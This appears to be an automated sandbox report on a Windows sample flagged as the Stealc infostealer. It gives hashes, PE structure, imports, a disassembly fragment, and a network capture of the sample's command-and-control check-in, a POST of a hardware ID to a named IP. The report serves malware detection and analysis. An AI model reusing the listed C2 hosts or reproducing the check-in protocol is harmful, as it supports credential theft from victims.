      UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
      • 185.104.112.62
      http://tldbonak.comGet hashmaliciousUnknownBrowse
      • 91.206.178.97
      7ECHtNYRdu.exeGet hashmaliciousVidarBrowse
      • 185.104.114.24
      Wi50Ux1Ats.exeGet hashmaliciousVidarBrowse
      • 185.104.114.24
      Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
      • 185.104.113.156
      Divergencias.exeGet hashmaliciousMaxtrilhaBrowse
      • 185.104.113.156
      arm7.lightGet hashmaliciousMiraiBrowse
      • 185.104.117.9
      No context
      No context
      No created / dropped files found
      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):6.887014434340717
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:QZzvG5G6VE.exe
      File size:310'272 bytes
      MD5:9c6ce24a5ff45b882abb5ccaca3cf63b
      SHA1:5f3cafa1ca674e671849502b4f4b74b898a7702a
      SHA256:254d94f6404f2c42199ce1c02c405c5ace05fa77cf197c688516a7c2fb61081d
      SHA512:52800d5785ffd43b1cef16325f2d162535c36cf2ee89e20674ad49c68f4a7362a74617cff8d9231269ff20863a338bfe7e2e6ad4ef01caddbd196d9acc835951
      SSDEEP:6144:pvpHLJSJh10oVJ4C3CO2uWGcTATRsYQiANCpUxEJKWc+T5omu7Uk9NTeeqK5+06K:pBrJ80K4C3CO2uWGcTATRsYQiANCpUse
      TLSH:B7646B2066E4B561C003F4334F7DE8EFA73A6512AB166DFA09C607B0BED5E986B35704
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F.."....4.1p\.mE.2.&c.EZ|.'.?.......*.3..v...AbR.J.c......U..B.Z..F.....vV...HO.......~...$.S...ub.-.z................PE..L..
      Icon Hash:00928e8e8686b000
      Entrypoint:0x4042f8
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Time Stamp:0x65C08D0C [Mon Feb 5 07:23:56 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:382a4d7b99200ee7e9686d1f1cde0258
      Instruction
      call 00007F26A93F0FAAh
      jmp 00007F26A93F0B29h
      and dword ptr [ecx+04h], 00000000h
      mov eax, ecx
      and dword ptr [ecx+08h], 00000000h
      mov dword ptr [ecx+04h], 00445360h
      mov dword ptr [ecx], 00445308h
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007F26A93F0C8Fh
      push 0044A74Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007F26A93F1D79h
      int3
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007F26A93F0160h
      push 0044A66Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007F26A93F1D5Ch
      int3
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007F26A93F0CCBh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007F26A93F0CBCh
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007F26A93F0CBEh
      add edx, 28h
      cmp edx, esi
      jne 00007F26A93F0C9Ch
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007F26A93F0CABh
      push esi
      call 00007F26A93F1410h
      test eax, eax
      je 00007F26A93F0CD2h
      mov eax, dword ptr fs:[00000018h]
      mov esi, 0044CA30h
      mov edx, dword ptr [eax+04h]
      jmp 00007F26A93F0CB6h
      cmp edx, eax
      je 00007F26A93F0CC2h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x4ad240x28.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x1030.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x49fb00x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49ef00x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x120000x130.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000xffb30x100003e56053295fe096992266f804cff731bFalse0.604644775390625data6.607741101121348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .Gk17A0x110000x57b0x600278bf331a378d377b069398c5d970d4eFalse0.7356770833333334data5.521855956079267IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x120000x393e20x39400446eeae577f940024198fdeb7ab20a4bFalse0.4073800832423581data6.5919649930476245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x4c0000x146c0xc00fe5e59a519c227296e1ac96c8f8255caFalse0.16243489583333334data2.1644385139883653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .reloc0x4e0000x10300x12005169643d56131354d87d7160007fc155False0.708984375data6.225699271745207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      DLLImport
      KERNEL32.dllVirtualProtect, GetModuleHandleA, GetProcAddress, VirtualAlloc, LoadLibraryA, lstrlenW, CreateThread, Sleep, WaitForSingleObject, FreeConsole, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, WriteConsoleW, RaiseException, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW, CompareStringW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer
      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      192.168.2.591.206.178.11849705802044243 02/05/24-11:51:54.791411TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4970580192.168.2.591.206.178.118
      TimestampSource PortDest PortSource IPDest IP
      Feb 5, 2024 11:51:54.566149950 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 11:51:54.789813042 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 11:51:54.790143967 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 11:51:54.791410923 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 11:51:55.015052080 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 11:51:55.020863056 CET804970591.206.178.118192.168.2.5
      Feb 5, 2024 11:51:55.020920992 CET4970580192.168.2.591.206.178.118
      Feb 5, 2024 11:51:56.478708029 CET4970580192.168.2.591.206.178.118
      • 91.206.178.118
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.54970591.206.178.118805668C:\Users\user\Desktop\QZzvG5G6VE.exe
      TimestampBytes transferredDirectionData
      Feb 5, 2024 11:51:54.791410923 CET410OUTPOST /31b57f88e9b186cd.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF
      Host: 91.206.178.118
      Content-Length: 209
      Connection: Keep-Alive
      Cache-Control: no-cache
      Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 43 30 46 32 34 38 43 42 43 37 31 34 38 36 35 37 30 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a
      Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="hwid"C5C0F248CBC71486570719------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build"EU------JJECGHJDBFIJJJKEHCBF--
      Feb 5, 2024 11:51:55.020863056 CET178INHTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Mon, 05 Feb 2024 10:51:54 GMT
      Content-Type: text/html; charset=UTF-8
      Content-Length: 8
      Connection: keep-alive
      Data Raw: 59 6d 78 76 59 32 73 3d
      Data Ascii: YmxvY2s=


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:11:51:52
      Start date:05/02/2024
      Path:C:\Users\user\Desktop\QZzvG5G6VE.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\Desktop\QZzvG5G6VE.exe
      Imagebase:0xae0000
      File size:310'272 bytes
      MD5 hash:9C6CE24A5FF45B882ABB5CCACA3CF63B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2003556694.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:11:51:52
      Start date:05/02/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >